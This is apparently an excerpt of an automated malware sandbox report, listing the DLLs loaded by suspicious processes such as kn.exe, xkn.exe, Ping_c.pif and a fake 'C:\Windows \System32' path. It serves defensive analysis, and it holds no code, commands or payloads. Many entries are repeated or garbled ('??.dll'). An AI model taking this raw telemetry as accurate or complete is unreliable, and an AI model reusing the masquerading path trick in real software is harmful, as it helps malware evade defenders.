        Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: atl.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\Public\xkn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows \System32\per.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows \System32\per.exeSection loaded: uxtheme.dll
        Source: C:\Windows \System32\per.exeSection loaded: windows.storage.dll
        Source: C:\Windows \System32\per.exeSection loaded: wldp.dll
        Source: C:\Windows \System32\per.exeSection loaded: propsys.dll
        Source: C:\Windows \System32\per.exeSection loaded: urlmon.dll
        Source: C:\Windows \System32\per.exeSection loaded: iertutil.dll
        Source: C:\Windows \System32\per.exeSection loaded: srvcli.dll
        Source: C:\Windows \System32\per.exeSection loaded: netutils.dll
        Source: C:\Windows \System32\per.exeSection loaded: ieframe.dll
        Source: C:\Windows \System32\per.exeSection loaded: netapi32.dll
        Source: C:\Windows \System32\per.exeSection loaded: version.dll
        Source: C:\Windows \System32\per.exeSection loaded: userenv.dll
        Source: C:\Windows \System32\per.exeSection loaded: winhttp.dll
        Source: C:\Windows \System32\per.exeSection loaded: wkscli.dll
        Source: C:\Windows \System32\per.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows \System32\per.exeSection loaded: edputil.dll
        Source: C:\Windows \System32\per.exeSection loaded: secur32.dll
        Source: C:\Windows \System32\per.exeSection loaded: sspicli.dll
        Source: C:\Windows \System32\per.exeSection loaded: mlang.dll
        Source: C:\Windows \System32\per.exeSection loaded: wininet.dll
        Source: C:\Windows \System32\per.exeSection loaded: profapi.dll
        Source: C:\Windows \System32\per.exeSection loaded: policymanager.dll
        Source: C:\Windows \System32\per.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows \System32\per.exeSection loaded: twinui.appcore.dll
        Source: C:\Windows \System32\per.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows \System32\per.exeSection loaded: wintypes.dll
        Source: C:\Windows \System32\per.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows \System32\per.exeSection loaded: mrmcorer.dll
        Source: C:\Windows \System32\per.exeSection loaded: windows.staterepositorycore.dll
        Source: C:\Windows \System32\per.exeSection loaded: windows.ui.dll
        Source: C:\Windows \System32\per.exeSection loaded: windowmanagementapi.dll
        Source: C:\Windows \System32\per.exeSection loaded: textinputframework.dll
        Source: C:\Windows \System32\per.exeSection loaded: inputhost.dll
        Source: C:\Windows \System32\per.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows \System32\per.exeSection loaded: coremessaging.dll
        Source: C:\Windows \System32\per.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows \System32\per.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows \System32\per.exeSection loaded: coremessaging.dll
        Source: C:\Windows \System32\per.exeSection loaded: coremessaging.dll
        Source: C:\Windows \System32\per.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows \System32\per.exeSection loaded: ntmarta.dll
        Source: C:\Windows \System32\per.exeSection loaded: bcp47mrm.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: apphelp.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: version.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: uxtheme.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: archiveint.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: cryptsp.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: url.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ieframe.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: iertutil.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: netapi32.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: userenv.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: winhttp.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: wkscli.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: netutils.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: windows.storage.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: wldp.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: kernel.appcore.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: propsys.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: cryptsp.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: smartscreenps.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: amsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: winmm.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: wininet.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: sspicli.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: profapi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???y.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???y.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???y.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ????.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ????.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ????.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???2.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???2.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???2.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ???.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??????s.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??????s?s.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??????s.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: mswsock.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: iphlpapi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: winnsi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: dnsapi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: rasadhlp.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: fwpuclnt.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: winhttpcom.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: webio.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: schannel.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: mskeyprotect.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ntasn1.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ncrypt.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ncryptsslp.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: msasn1.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: rsaenh.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: cryptbase.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: gpapi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: dpapi.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: mlang.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
        Source: C:\Users\Public\Libraries\Ping_c.pifSection loaded: ??.dll
